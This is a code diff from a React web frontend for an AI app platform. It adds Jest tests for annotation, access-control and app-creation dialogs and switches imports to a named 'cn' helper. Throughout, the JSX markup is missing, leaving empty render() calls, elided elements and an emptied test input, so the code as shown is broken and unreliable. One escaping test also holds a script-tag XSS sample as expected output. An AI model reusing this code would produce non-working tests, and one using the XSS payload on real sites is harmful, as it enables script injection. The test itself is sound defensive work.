+ + await waitFor(() => { + expect(fetchHitHistoryListMock).toHaveBeenCalled() + }) + + // Act + fireEvent.click(screen.getByTestId('edit-answer')) + + // Assert + await waitFor(() => { + expect(props.onSave).toHaveBeenCalledWith(props.item.question, 'answer-updated') + }, + ) + }) + + it('should switch to hit history tab and show no data message', async () => { + // Arrange + const { props } = renderComponent() + + await waitFor(() => { + expect(fetchHitHistoryListMock).toHaveBeenCalled() + }) + + // Act + fireEvent.click(screen.getByText('appAnnotation.viewModal.hitHistory')) + + // Assert + expect(await screen.findByText('appAnnotation.viewModal.noHitHistory')).toBeInTheDocument() + expect(mockFormatTime).toHaveBeenCalledWith(props.item.created_at, 'appLog.dateTimeFormat') + }) + + it('should render hit history entries with pagination badge when data exists', async () => { + const hits = [createHitHistoryItem({ question: 'user input' }), createHitHistoryItem({ id: 'hit-2', question: 'second' })] + fetchHitHistoryListMock.mockResolvedValue({ data: hits, total: 15 }) + + renderComponent() + + fireEvent.click(await screen.findByText('appAnnotation.viewModal.hitHistory')) + + expect(await screen.findByText('user input')).toBeInTheDocument() + expect(screen.getByText('15 appAnnotation.viewModal.hits')).toBeInTheDocument() + expect(mockFormatTime).toHaveBeenCalledWith(hits[0].created_at, 'appLog.dateTimeFormat') + }) + + it('should confirm before removing the annotation and hide on success', async () => { + const { props } = renderComponent() + + fireEvent.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + expect(await screen.findByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument() + + const confirmButton = await screen.findByRole('button', { name: 'common.operation.confirm' }) + fireEvent.click(confirmButton) + + await waitFor(() => { + expect(props.onRemove).toHaveBeenCalledTimes(1) + expect(props.onHide).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/annotation/view-annotation-modal/index.tsx b/web/app/components/app/annotation/view-annotation-modal/index.tsx index 8426ab0005..d21b177098 100644 --- a/web/app/components/app/annotation/view-annotation-modal/index.tsx +++ b/web/app/components/app/annotation/view-annotation-modal/index.tsx @@ -14,7 +14,7 @@ import TabSlider from '@/app/components/base/tab-slider-plain' import { fetchHitHistoryList } from '@/service/annotation' import { APP_PAGE_LIMIT } from '@/config' import useTimestamp from '@/hooks/use-timestamp' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' type Props = { appId: string diff --git a/web/app/components/app/app-access-control/access-control-dialog.tsx b/web/app/components/app/app-access-control/access-control-dialog.tsx index ee3fa9650b..99cf6d7074 100644 --- a/web/app/components/app/app-access-control/access-control-dialog.tsx +++ b/web/app/components/app/app-access-control/access-control-dialog.tsx @@ -2,7 +2,7 @@ import { Fragment, useCallback } from 'react' import type { ReactNode } from 'react' import { Dialog, Transition } from '@headlessui/react' import { RiCloseLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' type DialogProps = { className?: string diff --git a/web/app/components/app/app-access-control/access-control.spec.tsx b/web/app/components/app/app-access-control/access-control.spec.tsx new file mode 100644 index 0000000000..ea0e17de2e --- /dev/null +++ b/web/app/components/app/app-access-control/access-control.spec.tsx @@ -0,0 +1,389 @@ +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import AccessControl from './index' +import AccessControlDialog from './access-control-dialog' +import AccessControlItem from './access-control-item' +import AddMemberOrGroupDialog from './add-member-or-group-pop' +import SpecificGroupsOrMembers from './specific-groups-or-members' +import useAccessControlStore from '@/context/access-control-store' +import { useGlobalPublicStore } from '@/context/global-public-context' +import type { AccessControlAccount, AccessControlGroup, Subject } from '@/models/access-control' +import { AccessMode, SubjectType } from '@/models/access-control' +import Toast from '../../base/toast' +import { defaultSystemFeatures } from '@/types/feature' +import type { App } from '@/types/app' + +const mockUseAppWhiteListSubjects = jest.fn() +const mockUseSearchForWhiteListCandidates = jest.fn() +const mockMutateAsync = jest.fn() +const mockUseUpdateAccessMode = jest.fn(() => ({ + isPending: false, + mutateAsync: mockMutateAsync, +})) + +jest.mock('@/context/app-context', () => ({ + useSelector: (selector: (value: { userProfile: { email: string; id?: string; name?: string; avatar?: string; avatar_url?: string; is_password_set?: boolean } }) => T) => selector({ + userProfile: { + id: 'current-user', + name: 'Current User', + email: 'member@example.com', + avatar: '', + avatar_url: '', + is_password_set: true, + }, + }), +})) + +jest.mock('@/service/common', () => ({ + fetchCurrentWorkspace: jest.fn(), + fetchLangGeniusVersion: jest.fn(), + fetchUserProfile: jest.fn(), + getSystemFeatures: jest.fn(), +})) + +jest.mock('@/service/access-control', () => ({ + useAppWhiteListSubjects: (...args: unknown[]) => mockUseAppWhiteListSubjects(...args), + useSearchForWhiteListCandidates: (...args: unknown[]) => mockUseSearchForWhiteListCandidates(...args), + useUpdateAccessMode: () => mockUseUpdateAccessMode(), +})) + +jest.mock('@headlessui/react', () => { + const DialogComponent: any = ({ children, className, ...rest }: any) => ( +
{children}
+ ) + DialogComponent.Panel = ({ children, className, ...rest }: any) => ( +
{children}
+ ) + const DialogTitle = ({ children, className, ...rest }: any) => ( +
{children}
+ ) + const DialogDescription = ({ children, className, ...rest }: any) => ( +
{children}
+ ) + const TransitionChild = ({ children }: any) => ( + <>{typeof children === 'function' ? children({}) : children} + ) + const Transition = ({ show = true, children }: any) => ( + show ? <>{typeof children === 'function' ? children({}) : children} : null + ) + Transition.Child = TransitionChild + return { + Dialog: DialogComponent, + Transition, + DialogTitle, + Description: DialogDescription, + } +}) + +jest.mock('ahooks', () => { + const actual = jest.requireActual('ahooks') + return { + ...actual, + useDebounce: (value: unknown) => value, + } +}) + +const createGroup = (overrides: Partial = {}): AccessControlGroup => ({ + id: 'group-1', + name: 'Group One', + groupSize: 5, + ...overrides, +} as AccessControlGroup) + +const createMember = (overrides: Partial = {}): AccessControlAccount => ({ + id: 'member-1', + name: 'Member One', + email: 'member@example.com', + avatar: '', + avatarUrl: '', + ...overrides, +} as AccessControlAccount) + +const baseGroup = createGroup() +const baseMember = createMember() +const groupSubject: Subject = { + subjectId: baseGroup.id, + subjectType: SubjectType.GROUP, + groupData: baseGroup, +} as Subject +const memberSubject: Subject = { + subjectId: baseMember.id, + subjectType: SubjectType.ACCOUNT, + accountData: baseMember, +} as Subject + +const resetAccessControlStore = () => { + useAccessControlStore.setState({ + appId: '', + specificGroups: [], + specificMembers: [], + currentMenu: AccessMode.SPECIFIC_GROUPS_MEMBERS, + selectedGroupsForBreadcrumb: [], + }) +} + +const resetGlobalStore = () => { + useGlobalPublicStore.setState({ + systemFeatures: defaultSystemFeatures, + isGlobalPending: false, + }) +} + +beforeAll(() => { + class MockIntersectionObserver { + observe = jest.fn(() => undefined) + disconnect = jest.fn(() => undefined) + unobserve = jest.fn(() => undefined) + } + // @ts-expect-error jsdom does not implement IntersectionObserver + globalThis.IntersectionObserver = MockIntersectionObserver +}) + +beforeEach(() => { + jest.clearAllMocks() + resetAccessControlStore() + resetGlobalStore() + mockMutateAsync.mockResolvedValue(undefined) + mockUseUpdateAccessMode.mockReturnValue({ + isPending: false, + mutateAsync: mockMutateAsync, + }) + mockUseAppWhiteListSubjects.mockReturnValue({ + isPending: false, + data: { + groups: [baseGroup], + members: [baseMember], + }, + }) + mockUseSearchForWhiteListCandidates.mockReturnValue({ + isLoading: false, + isFetchingNextPage: false, + fetchNextPage: jest.fn(), + data: { pages: [{ currPage: 1, subjects: [groupSubject, memberSubject], hasMore: false }] }, + }) +}) + +// AccessControlItem handles selected vs. unselected styling and click state updates +describe('AccessControlItem', () => { + it('should update current menu when selecting a different access type', () => { + useAccessControlStore.setState({ currentMenu: AccessMode.PUBLIC }) + render( + + Organization Only + , + ) + + const option = screen.getByText('Organization Only').parentElement as HTMLElement + expect(option).toHaveClass('cursor-pointer') + + fireEvent.click(option) + + expect(useAccessControlStore.getState().currentMenu).toBe(AccessMode.ORGANIZATION) + }) + + it('should keep current menu when clicking the selected access type', () => { + useAccessControlStore.setState({ currentMenu: AccessMode.ORGANIZATION }) + render( + + Organization Only + , + ) + + const option = screen.getByText('Organization Only').parentElement as HTMLElement + fireEvent.click(option) + + expect(useAccessControlStore.getState().currentMenu).toBe(AccessMode.ORGANIZATION) + }) +}) + +// AccessControlDialog renders a headless UI dialog with a manual close control +describe('AccessControlDialog', () => { + it('should render dialog content when visible', () => { + render( + +
Dialog Content
+
, + ) + + expect(screen.getByRole('dialog')).toBeInTheDocument() + expect(screen.getByText('Dialog Content')).toBeInTheDocument() + }) + + it('should trigger onClose when clicking the close control', async () => { + const handleClose = jest.fn() + const { container } = render( + +
Dialog Content
+
, + ) + + const closeButton = container.querySelector('.absolute.right-5.top-5') as HTMLElement + fireEvent.click(closeButton) + + await waitFor(() => { + expect(handleClose).toHaveBeenCalledTimes(1) + }) + }) +}) + +// SpecificGroupsOrMembers syncs store state with fetched data and supports removals +describe('SpecificGroupsOrMembers', () => { + it('should render collapsed view when not in specific selection mode', () => { + useAccessControlStore.setState({ currentMenu: AccessMode.ORGANIZATION }) + + render() + + expect(screen.getByText('app.accessControlDialog.accessItems.specific')).toBeInTheDocument() + expect(screen.queryByText(baseGroup.name)).not.toBeInTheDocument() + }) + + it('should show loading state while pending', async () => { + useAccessControlStore.setState({ appId: 'app-1', currentMenu: AccessMode.SPECIFIC_GROUPS_MEMBERS }) + mockUseAppWhiteListSubjects.mockReturnValue({ + isPending: true, + data: undefined, + }) + + const { container } = render() + + await waitFor(() => { + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + }) + + it('should render fetched groups and members and support removal', async () => { + useAccessControlStore.setState({ appId: 'app-1', currentMenu: AccessMode.SPECIFIC_GROUPS_MEMBERS }) + + render() + + await waitFor(() => { + expect(screen.getByText(baseGroup.name)).toBeInTheDocument() + expect(screen.getByText(baseMember.name)).toBeInTheDocument() + }) + + const groupItem = screen.getByText(baseGroup.name).closest('div') + const groupRemove = groupItem?.querySelector('.h-4.w-4.cursor-pointer') as HTMLElement + fireEvent.click(groupRemove) + + await waitFor(() => { + expect(screen.queryByText(baseGroup.name)).not.toBeInTheDocument() + }) + + const memberItem = screen.getByText(baseMember.name).closest('div') + const memberRemove = memberItem?.querySelector('.h-4.w-4.cursor-pointer') as HTMLElement + fireEvent.click(memberRemove) + + await waitFor(() => { + expect(screen.queryByText(baseMember.name)).not.toBeInTheDocument() + }) + }) +}) + +// AddMemberOrGroupDialog renders search results and updates store selections +describe('AddMemberOrGroupDialog', () => { + it('should open search popover and display candidates', async () => { + const user = userEvent.setup() + + render() + + await user.click(screen.getByText('common.operation.add')) + + expect(screen.getByPlaceholderText('app.accessControlDialog.operateGroupAndMember.searchPlaceholder')).toBeInTheDocument() + expect(screen.getByText(baseGroup.name)).toBeInTheDocument() + expect(screen.getByText(baseMember.name)).toBeInTheDocument() + }) + + it('should allow selecting members and expanding groups', async () => { + const user = userEvent.setup() + render() + + await user.click(screen.getByText('common.operation.add')) + + const expandButton = screen.getByText('app.accessControlDialog.operateGroupAndMember.expand') + await user.click(expandButton) + expect(useAccessControlStore.getState().selectedGroupsForBreadcrumb).toEqual([baseGroup]) + + const memberLabel = screen.getByText(baseMember.name) + const memberCheckbox = memberLabel.parentElement?.previousElementSibling as HTMLElement + fireEvent.click(memberCheckbox) + + expect(useAccessControlStore.getState().specificMembers).toEqual([baseMember]) + }) + + it('should show empty state when no candidates are returned', async () => { + mockUseSearchForWhiteListCandidates.mockReturnValue({ + isLoading: false, + isFetchingNextPage: false, + fetchNextPage: jest.fn(), + data: { pages: [] }, + }) + + const user = userEvent.setup() + render() + + await user.click(screen.getByText('common.operation.add')) + + expect(screen.getByText('app.accessControlDialog.operateGroupAndMember.noResult')).toBeInTheDocument() + }) +}) + +// AccessControl integrates dialog, selection items, and confirm flow +describe('AccessControl', () => { + it('should initialize menu from app and call update on confirm', async () => { + const onClose = jest.fn() + const onConfirm = jest.fn() + const toastSpy = jest.spyOn(Toast, 'notify').mockReturnValue({}) + useAccessControlStore.setState({ + specificGroups: [baseGroup], + specificMembers: [baseMember], + }) + const app = { + id: 'app-id-1', + access_mode: AccessMode.SPECIFIC_GROUPS_MEMBERS, + } as App + + render( + , + ) + + await waitFor(() => { + expect(useAccessControlStore.getState().currentMenu).toBe(AccessMode.SPECIFIC_GROUPS_MEMBERS) + }) + + fireEvent.click(screen.getByText('common.operation.confirm')) + + await waitFor(() => { + expect(mockMutateAsync).toHaveBeenCalledWith({ + appId: app.id, + accessMode: AccessMode.SPECIFIC_GROUPS_MEMBERS, + subjects: [ + { subjectId: baseGroup.id, subjectType: SubjectType.GROUP }, + { subjectId: baseMember.id, subjectType: SubjectType.ACCOUNT }, + ], + }) + expect(toastSpy).toHaveBeenCalled() + expect(onConfirm).toHaveBeenCalled() + }) + }) + + it('should expose the external members tip when SSO is disabled', () => { + const app = { + id: 'app-id-2', + access_mode: AccessMode.PUBLIC, + } as App + + render( + , + ) + + expect(screen.getByText('app.accessControlDialog.accessItems.external')).toBeInTheDocument() + expect(screen.getByText('app.accessControlDialog.accessItems.anyone')).toBeInTheDocument() + }) +}) diff --git a/web/app/components/app/app-access-control/add-member-or-group-pop.tsx b/web/app/components/app/app-access-control/add-member-or-group-pop.tsx index e9519aeedf..17263fdd46 100644 --- a/web/app/components/app/app-access-control/add-member-or-group-pop.tsx +++ b/web/app/components/app/app-access-control/add-member-or-group-pop.tsx @@ -11,7 +11,7 @@ import Input from '../../base/input' import { PortalToFollowElem, PortalToFollowElemContent, PortalToFollowElemTrigger } from '../../base/portal-to-follow-elem' import Loading from '../../base/loading' import useAccessControlStore from '../../../../context/access-control-store' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useSearchForWhiteListCandidates } from '@/service/access-control' import type { AccessControlAccount, AccessControlGroup, Subject, SubjectAccount, SubjectGroup } from '@/models/access-control' import { SubjectType } from '@/models/access-control' @@ -32,7 +32,7 @@ export default function AddMemberOrGroupDialog() { const anchorRef = useRef(null) useEffect(() => { - const hasMore = data?.pages?.[0].hasMore ?? false + const hasMore = data?.pages?.[0]?.hasMore ?? false let observer: IntersectionObserver | undefined if (anchorRef.current) { observer = new IntersectionObserver((entries) => { @@ -106,7 +106,7 @@ function SelectedGroupsBreadCrumb() { setSelectedGroupsForBreadcrumb([]) }, [setSelectedGroupsForBreadcrumb]) return
- 0 && 'cursor-pointer text-text-accent')} onClick={handleReset}>{t('app.accessControlDialog.operateGroupAndMember.allMembers')} + 0 && 'cursor-pointer text-text-accent')} onClick={handleReset}>{t('app.accessControlDialog.operateGroupAndMember.allMembers')} {selectedGroupsForBreadcrumb.map((group, index) => { return
/ @@ -198,7 +198,7 @@ type BaseItemProps = { children: React.ReactNode } function BaseItem({ children, className }: BaseItemProps) { - return
+ return
{children}
} diff --git a/web/app/components/app/app-publisher/index.tsx b/web/app/components/app/app-publisher/index.tsx index bba5ebfa21..5aea337f85 100644 --- a/web/app/components/app/app-publisher/index.tsx +++ b/web/app/components/app/app-publisher/index.tsx @@ -42,6 +42,7 @@ import type { InputVar, Variable } from '@/app/components/workflow/types' import { appDefaultIconBackground } from '@/config' import { useGlobalPublicStore } from '@/context/global-public-context' import { useFormatTimeFromNow } from '@/hooks/use-format-time-from-now' +import { useAsyncWindowOpen } from '@/hooks/use-async-window-open' import { AccessMode } from '@/models/access-control' import { useAppWhiteListSubjects, useGetUserCanAccessApp } from '@/service/access-control' import { fetchAppDetailDirect } from '@/service/apps' @@ -50,6 +51,7 @@ import { AppModeEnum } from '@/types/app' import type { PublishWorkflowParams } from '@/types/workflow' import { basePath } from '@/utils/var' import UpgradeBtn from '@/app/components/billing/upgrade-btn' +import { trackEvent } from '@/app/components/base/amplitude' const ACCESS_MODE_MAP: Record = { [AccessMode.ORGANIZATION]: { @@ -153,6 +155,7 @@ const AppPublisher = ({ const { data: userCanAccessApp, isLoading: isGettingUserCanAccessApp, refetch } = useGetUserCanAccessApp({ appId: appDetail?.id, enabled: false }) const { data: appAccessSubjects, isLoading: isGettingAppWhiteListSubjects } = useAppWhiteListSubjects(appDetail?.id, open && systemFeatures.webapp_auth.enabled && appDetail?.access_mode === AccessMode.SPECIFIC_GROUPS_MEMBERS) + const openAsyncWindow = useAsyncWindowOpen() const noAccessPermission = useMemo(() => systemFeatures.webapp_auth.enabled && appDetail && appDetail.access_mode !== AccessMode.EXTERNAL_MEMBERS && !userCanAccessApp?.result, [systemFeatures, appDetail, userCanAccessApp]) const disabledFunctionButton = useMemo(() => (!publishedAt || missingStartNode || noAccessPermission), [publishedAt, missingStartNode, noAccessPermission]) @@ -187,11 +190,12 @@ const AppPublisher = ({ try { await onPublish?.(params) setPublished(true) + trackEvent('app_published_time', { action_mode: 'app', app_id: appDetail?.id, app_name: appDetail?.name }) } catch { setPublished(false) } - }, [onPublish]) + }, [appDetail, onPublish]) const handleRestore = useCallback(async () => { try { @@ -217,17 +221,19 @@ const AppPublisher = ({ }, [disabled, onToggle, open]) const handleOpenInExplore = useCallback(async () => { - try { + await openAsyncWindow(async () => { + if (!appDetail?.id) + throw new Error('App not found') const { installed_apps }: any = await fetchInstalledAppList(appDetail?.id) || {} if (installed_apps?.length > 0) - window.open(`${basePath}/explore/installed/${installed_apps[0].id}`, '_blank') - else - throw new Error('No app found in Explore') - } - catch (e: any) { - Toast.notify({ type: 'error', message: `${e.message || e}` }) - } - }, [appDetail?.id]) + return `${basePath}/explore/installed/${installed_apps[0].id}` + throw new Error('No app found in Explore') + }, { + onError: (err) => { + Toast.notify({ type: 'error', message: `${err.message || err}` }) + }, + }) + }, [appDetail?.id, openAsyncWindow]) const handleAccessControlUpdate = useCallback(async () => { if (!appDetail) diff --git a/web/app/components/app/app-publisher/suggested-action.tsx b/web/app/components/app/app-publisher/suggested-action.tsx index 2535de6654..154bacc361 100644 --- a/web/app/components/app/app-publisher/suggested-action.tsx +++ b/web/app/components/app/app-publisher/suggested-action.tsx @@ -1,6 +1,6 @@ import type { HTMLProps, PropsWithChildren } from 'react' import { RiArrowRightUpLine } from '@remixicon/react' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' export type SuggestedActionProps = PropsWithChildren & { icon?: React.ReactNode @@ -19,11 +19,9 @@ const SuggestedAction = ({ icon, link, disabled, children, className, onClick, . href={disabled ? undefined : link} target='_blank' rel='noreferrer' - className={classNames( - 'flex items-center justify-start gap-2 rounded-lg bg-background-section-burn px-2.5 py-2 text-text-secondary transition-colors [&:not(:first-child)]:mt-1', + className={cn('flex items-center justify-start gap-2 rounded-lg bg-background-section-burn px-2.5 py-2 text-text-secondary transition-colors [&:not(:first-child)]:mt-1', disabled ? 'cursor-not-allowed opacity-30 shadow-xs' : 'cursor-pointer text-text-secondary hover:bg-state-accent-hover hover:text-text-accent', - className, - )} + className)} onClick={handleClick} {...props} > diff --git a/web/app/components/app/configuration/base/feature-panel/index.tsx b/web/app/components/app/configuration/base/feature-panel/index.tsx index ec5ab96d76..c9ebfefbe5 100644 --- a/web/app/components/app/configuration/base/feature-panel/index.tsx +++ b/web/app/components/app/configuration/base/feature-panel/index.tsx @@ -1,7 +1,7 @@ 'use client' import type { FC, ReactNode } from 'react' import React from 'react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' export type IFeaturePanelProps = { className?: string diff --git a/web/app/components/app/configuration/base/group-name/index.spec.tsx b/web/app/components/app/configuration/base/group-name/index.spec.tsx new file mode 100644 index 0000000000..ac504247f2 --- /dev/null +++ b/web/app/components/app/configuration/base/group-name/index.spec.tsx @@ -0,0 +1,21 @@ +import { render, screen } from '@testing-library/react' +import GroupName from './index' + +describe('GroupName', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render name when provided', () => { + // Arrange + const title = 'Inputs' + + // Act + render() + + // Assert + expect(screen.getByText(title)).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/configuration/base/operation-btn/index.spec.tsx b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx new file mode 100644 index 0000000000..615a1769e8 --- /dev/null +++ b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx @@ -0,0 +1,70 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import OperationBtn from './index' + +jest.mock('@remixicon/react', () => ({ + RiAddLine: (props: { className?: string }) => ( + + ), + RiEditLine: (props: { className?: string }) => ( + + ), +})) + +describe('OperationBtn', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering icons and translation labels + describe('Rendering', () => { + it('should render passed custom class when provided', () => { + // Arrange + const customClass = 'custom-class' + + // Act + render() + + // Assert + expect(screen.getByText('common.operation.add').parentElement).toHaveClass(customClass) + }) + it('should render add icon when type is add', () => { + // Arrange + const onClick = jest.fn() + + // Act + render() + + // Assert + expect(screen.getByTestId('add-icon')).toBeInTheDocument() + expect(screen.getByText('common.operation.add')).toBeInTheDocument() + }) + + it('should render edit icon when provided', () => { + // Arrange + const actionName = 'Rename' + + // Act + render() + + // Assert + expect(screen.getByTestId('edit-icon')).toBeInTheDocument() + expect(screen.queryByTestId('add-icon')).toBeNull() + expect(screen.getByText(actionName)).toBeInTheDocument() + }) + }) + + // Click handling + describe('Interactions', () => { + it('should execute click handler when button is clicked', () => { + // Arrange + const onClick = jest.fn() + render() + + // Act + fireEvent.click(screen.getByText('common.operation.add')) + + // Assert + expect(onClick).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/configuration/base/operation-btn/index.tsx b/web/app/components/app/configuration/base/operation-btn/index.tsx index aba35cded2..db19d2976e 100644 --- a/web/app/components/app/configuration/base/operation-btn/index.tsx +++ b/web/app/components/app/configuration/base/operation-btn/index.tsx @@ -6,7 +6,7 @@ import { RiAddLine, RiEditLine, } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { noop } from 'lodash-es' export type IOperationBtnProps = { diff --git a/web/app/components/app/configuration/base/var-highlight/index.spec.tsx b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx new file mode 100644 index 0000000000..9e84aa09ac --- /dev/null +++ b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx @@ -0,0 +1,62 @@ +import { render, screen } from '@testing-library/react' +import VarHighlight, { varHighlightHTML } from './index' + +describe('VarHighlight', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering highlighted variable tags + describe('Rendering', () => { + it('should render braces around the variable name with default styles', () => { + // Arrange + const props = { name: 'userInput' } + + // Act + const { container } = render() + + // Assert + expect(screen.getByText('userInput')).toBeInTheDocument() + expect(screen.getAllByText('{{')[0]).toBeInTheDocument() + expect(screen.getAllByText('}}')[0]).toBeInTheDocument() + expect(container.firstChild).toHaveClass('item') + }) + + it('should apply custom class names when provided', () => { + // Arrange + const props = { name: 'custom', className: 'mt-2' } + + // Act + const { container } = render() + + // Assert + expect(container.firstChild).toHaveClass('mt-2') + }) + }) + + // Escaping HTML via helper + describe('varHighlightHTML', () => { + it('should escape dangerous characters before returning HTML string', () => { + // Arrange + const props = { name: '' } + + // Act + const html = varHighlightHTML(props) + + // Assert + expect(html).toContain('<script>alert('xss')</script>') + expect(html).not.toContain(' & Special "Chars"', + }, + } + render() + + expect(screen.getByText('App & Special "Chars"')).toBeInTheDocument() + }) + + it('should handle onCreate function throwing error', async () => { + const errorOnCreate = jest.fn(() => { + throw new Error('Create failed') + }) + + // Mock console.error to avoid test output noise + const consoleSpy = jest.spyOn(console, 'error').mockImplementation(jest.fn()) + + render() + + const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ }) + let capturedError: unknown + try { + await userEvent.click(button) + } + catch (err) { + capturedError = err + } + expect(errorOnCreate).toHaveBeenCalledTimes(1) + expect(consoleSpy).toHaveBeenCalled() + if (capturedError instanceof Error) + expect(capturedError.message).toContain('Create failed') + + consoleSpy.mockRestore() + }) + }) + + describe('Accessibility', () => { + it('should have proper elements for accessibility', () => { + const { container } = render() + + expect(container.querySelector('em-emoji')).toBeInTheDocument() + expect(container.querySelector('svg')).toBeInTheDocument() + }) + + it('should have title attribute for app name when truncated', () => { + render() + + const nameElement = screen.getByText('Test Chat App') + expect(nameElement).toHaveAttribute('title', 'Test Chat App') + }) + + it('should have accessible button with proper label', () => { + render() + + const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ }) + expect(button).toBeEnabled() + expect(button).toHaveTextContent('app.newApp.useTemplate') + }) + }) + + describe('User-Visible Behavior Tests', () => { + it('should show plus icon in create button', () => { + render() + + expect(screen.getByTestId('plus-icon')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/create-app-dialog/app-card/index.tsx b/web/app/components/app/create-app-dialog/app-card/index.tsx index 7f7ede0065..df35a74ec7 100644 --- a/web/app/components/app/create-app-dialog/app-card/index.tsx +++ b/web/app/components/app/create-app-dialog/app-card/index.tsx @@ -3,7 +3,7 @@ import { useTranslation } from 'react-i18next' import { PlusIcon } from '@heroicons/react/20/solid' import { AppTypeIcon, AppTypeLabel } from '../../type-selector' import Button from '@/app/components/base/button' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import type { App } from '@/models/explore' import AppIcon from '@/app/components/base/app-icon' @@ -15,6 +15,7 @@ export type AppCardProps = { const AppCard = ({ app, + canCreate, onCreate, }: AppCardProps) => { const { t } = useTranslation() @@ -45,14 +46,16 @@ const AppCard = ({ {app.description}
- ) } diff --git a/web/app/components/app/create-app-dialog/app-list/index.tsx b/web/app/components/app/create-app-dialog/app-list/index.tsx index 51b6874d52..4655d7a676 100644 --- a/web/app/components/app/create-app-dialog/app-list/index.tsx +++ b/web/app/components/app/create-app-dialog/app-list/index.tsx @@ -11,7 +11,7 @@ import AppCard from '../app-card' import Sidebar, { AppCategories, AppCategoryLabel } from './sidebar' import Toast from '@/app/components/base/toast' import Divider from '@/app/components/base/divider' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import ExploreContext from '@/context/explore-context' import type { App } from '@/models/explore' import { fetchAppDetail, fetchAppList } from '@/service/explore' diff --git a/web/app/components/app/create-app-dialog/app-list/sidebar.tsx b/web/app/components/app/create-app-dialog/app-list/sidebar.tsx index 85c55c5385..89062cdcf9 100644 --- a/web/app/components/app/create-app-dialog/app-list/sidebar.tsx +++ b/web/app/components/app/create-app-dialog/app-list/sidebar.tsx @@ -1,7 +1,7 @@ 'use client' import { RiStickyNoteAddLine, RiThumbUpLine } from '@remixicon/react' import { useTranslation } from 'react-i18next' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Divider from '@/app/components/base/divider' export enum AppCategories { @@ -40,13 +40,13 @@ type CategoryItemProps = { } function CategoryItem({ category, active, onClick }: CategoryItemProps) { return
  • { onClick?.(category) }}> {category === AppCategories.RECOMMENDED &&
    } + className={cn('system-sm-medium text-components-menu-item-text group-hover:text-components-menu-item-text-hover group-[.active]:text-components-menu-item-text-active', active && 'system-sm-semibold')} />
  • } diff --git a/web/app/components/app/create-app-dialog/index.spec.tsx b/web/app/components/app/create-app-dialog/index.spec.tsx new file mode 100644 index 0000000000..db4384a173 --- /dev/null +++ b/web/app/components/app/create-app-dialog/index.spec.tsx @@ -0,0 +1,287 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import CreateAppTemplateDialog from './index' + +// Mock external dependencies (not base components) +jest.mock('./app-list', () => { + return function MockAppList({ + onCreateFromBlank, + onSuccess, + }: { + onCreateFromBlank?: () => void + onSuccess: () => void + }) { + return ( +
    + + {onCreateFromBlank && ( + + )} +
    + ) + } +}) + +jest.mock('ahooks', () => ({ + useKeyPress: jest.fn((_key: string, _callback: () => void) => { + // Mock implementation for testing + return jest.fn() + }), +})) + +describe('CreateAppTemplateDialog', () => { + const defaultProps = { + show: false, + onSuccess: jest.fn(), + onClose: jest.fn(), + onCreateFromBlank: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should not render when show is false', () => { + render() + + // FullScreenModal should not render any content when open is false + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + }) + + it('should render modal when show is true', () => { + render() + + // FullScreenModal renders with role="dialog" + expect(screen.getByRole('dialog')).toBeInTheDocument() + expect(screen.getByTestId('app-list')).toBeInTheDocument() + }) + + it('should render create from blank button when onCreateFromBlank is provided', () => { + render() + + expect(screen.getByTestId('create-from-blank')).toBeInTheDocument() + }) + + it('should not render create from blank button when onCreateFromBlank is not provided', () => { + const { onCreateFromBlank: _onCreateFromBlank, ...propsWithoutOnCreate } = defaultProps + + render() + + expect(screen.queryByTestId('create-from-blank')).not.toBeInTheDocument() + }) + }) + + describe('Props', () => { + it('should pass show prop to FullScreenModal', () => { + const { rerender } = render() + + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + + rerender() + expect(screen.getByRole('dialog')).toBeInTheDocument() + }) + + it('should pass closable prop to FullScreenModal', () => { + // Since the FullScreenModal is always rendered with closable=true + // we can verify that the modal renders with the proper structure + render() + + // Verify that the modal has the proper dialog structure + const dialog = screen.getByRole('dialog') + expect(dialog).toBeInTheDocument() + expect(dialog).toHaveAttribute('aria-modal', 'true') + }) + }) + + describe('User Interactions', () => { + it('should handle close interactions', () => { + const mockOnClose = jest.fn() + render() + + // Test that the modal is rendered + const dialog = screen.getByRole('dialog') + expect(dialog).toBeInTheDocument() + + // Test that AppList component renders (child component interactions) + expect(screen.getByTestId('app-list')).toBeInTheDocument() + expect(screen.getByTestId('app-list-success')).toBeInTheDocument() + }) + + it('should call both onSuccess and onClose when app list success is triggered', () => { + const mockOnSuccess = jest.fn() + const mockOnClose = jest.fn() + render() + + fireEvent.click(screen.getByTestId('app-list-success')) + + expect(mockOnSuccess).toHaveBeenCalledTimes(1) + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should call onCreateFromBlank when create from blank is clicked', () => { + const mockOnCreateFromBlank = jest.fn() + render() + + 